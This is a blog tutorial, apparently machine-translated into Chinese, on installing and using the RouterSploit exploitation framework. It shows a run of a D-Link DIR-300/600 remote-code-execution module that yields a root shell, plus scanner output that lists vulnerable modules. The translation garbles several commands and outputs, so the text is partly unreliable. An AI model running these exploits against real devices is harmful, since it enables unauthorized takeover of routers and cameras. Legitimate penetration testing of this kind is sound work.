Linux的工具

RouterSploit – 開發框架完整教程 [2020]

RouterSploit 是專門為嵌入式設備開發的驚人開發框架.

pentester可以使用此工具來掃描攝像機和路由器的安全性.

RouterSploit的亮點:

  • 用Python編碼.
  • 命令行界面.
  • Docker支持.
  • 模塊化工具.

支持的操作系統:

  1. 蘋果系統.
  2. Linux的.
  3. Android手機.
  4. 視窗.

安裝RouterSploit:

要求:

  • 未來
  • 要求
  • 帕拉米科
  • pysnmp
  • 隱密

可選的:

  • 藍牙–低功耗藍牙

在Kali Linux中安裝:

請遵循以下命令:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

低功耗藍牙支持:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

在Ubuntu中安裝:

請遵循以下命令:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

低功耗藍牙支持:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

在MacOS上安裝:

請遵循以下命令:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

在Docker上安裝:

請遵循以下命令:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

如何更新RouterSploit?

您需要經常更新RouterSploit以避免帶來不便.

幾乎每天都有新模塊發貨.

cd routersploit
git pull

如何使用RouterSploit?

用法

根@kalidev:〜/ git / routersploit#./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_ / / ___ _ _| |_ ___ _ __ `-. _ __ | | ___ _| |_
 |    // _ \| | | | __ / _ \ '__|`-. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __ / |  /\__ / / |_) | | (_) | | |_
  _| \_  ___ /  __,_|\__  ___|_|  \____ /| .__ /|_|\___ /|_|\__|
                                     | |
       開發框架    |_|   通過Threat9
            嵌入式設備
  
 代碼名稱   : 我知道你惹上了麻煩
 版    : 3.3.0
 主頁   : HTTPS://www.threat9.com/ - @蘇氨酸
 加入鬆弛 : routersploit.slack.com

 加入Threat9 Beta計劃 - HTTPS://www.threat9.com/

 漏洞利用: 128 掃描儀: 4 Creds: 165 泛型: 4 有效載荷: 32 編碼器: 6

rsf >

漏洞利用:

進行剝削, 只需選擇模塊並設置目標:

rsf > 使用漏洞利用/
exploits / 2wire / explois / asmax / explois / asus / explois / cisco / explois / dlink / explois / fortinet / explois / juniper / explois / linksys / explois / multi / explois / netgear /
rsf > 使用exploit / dlink / dir_300_600_rce
rsf (凌華DIR-300 & DIR-600 RCE) >

完成使用tab鍵.

顯示選項, 類型 show:

rsf (凌華DIR-300 & DIR-600 RCE) > 顯示選項

目標選項:


   名稱當前設置說明                                
   ----       ----------------     -----------                                
   目標目標地址,例如. HTTP://192.168.1.1     
   港口       80                   目標端口

run 要么 exploit 命令利用目標:

rsf (凌華DIR-300 & DIR-600 RCE) > 跑
[+] 目標很脆弱
[*] 調用命令循環.
命令 > 我是誰
根

設定選項:

rsf (凌華DIR-300 & DIR-600 RCE) > 設定目標http://192.168.1.1 [+] {'目標': 'http://192.168.1.1'}

可以檢查目標是否容易受到特定攻擊:

rsf (凌華DIR-300 & DIR-600 RCE) > 檢查
[+] 目標很脆弱

show info 顯示有​​關漏洞利用的信息.

掃描易受攻擊的目標:

掃描程序可以快速驗證目標是否易受任何攻擊.

使用相同的命令顯示/設置選項, 還要跑.

rsf (D-Link掃描儀) > 跑
[+] exploits / dlink / dwr_932_info_disclosure容易受到攻擊
[-] exploits / dlink / dir_300_320_615_auth_bypass不容易受到攻擊
[-] exploits / dlink / dsl_2750b_info_disclosure不容易受到攻擊
[-] exploits / dlink / dns_320l_327l_rce不容易受到攻擊
[-] exploits / dlink / dir_645_password_disclosure不容易受到攻擊
[-] exploits / dlink / dir_300_600_615_info_disclosure不容易受到攻擊
[-] exploits / dlink / dir_300_600_rce不容易受到攻擊

[+] 設備易受攻擊!
- exploits / dlink / dwr_932_info_disclosure

官方RouterSploit

還閱讀: 1337X代理

最後的話:

RouterSploit 是一個很棒的工具.

如果您遇到有關 RouterSploit. 請務必在下方留言. 我們的CSHAWK團隊將盡快與您聯繫.

該Suyash

這是來自印度Suyash. 的一份網絡安全熱情, YouTube用戶, 博客, 自由職業者和具有pentester. 他經常寫文章與世界分享他的知識.

最近的帖子

適合嶄露頭角的音樂家的熱門應用程式和軟體

隨著眾多科技趨勢的興起, 所有行業都在受益. Different technologies

12 months ago

最佳 9 線上遊戲時保證自身安全的提示

線上遊戲是當今快節奏的數位世界的最新常態. The internet now offers

1 year ago

為您的金融科技業務延期納稅的利弊

報稅季: 一年中的這個時候,許多個人和企業都害怕. The weight of ensuring

1 year ago

最佳 5 最受歡迎的遊戲 2023 – 詳細回顧!

當我們進入最後幾個月時 2023, we can talk more clearly about

1 year ago

《我的世界傳奇》會免費嗎?

自發布以來 2011, Minecraft has become one of the most played video games

1 year ago

Minecraft Java 可以在 Xbox 上玩嗎?

Minecraft 已經活躍了十多年, and in that time it has

1 year ago

This website uses cookies.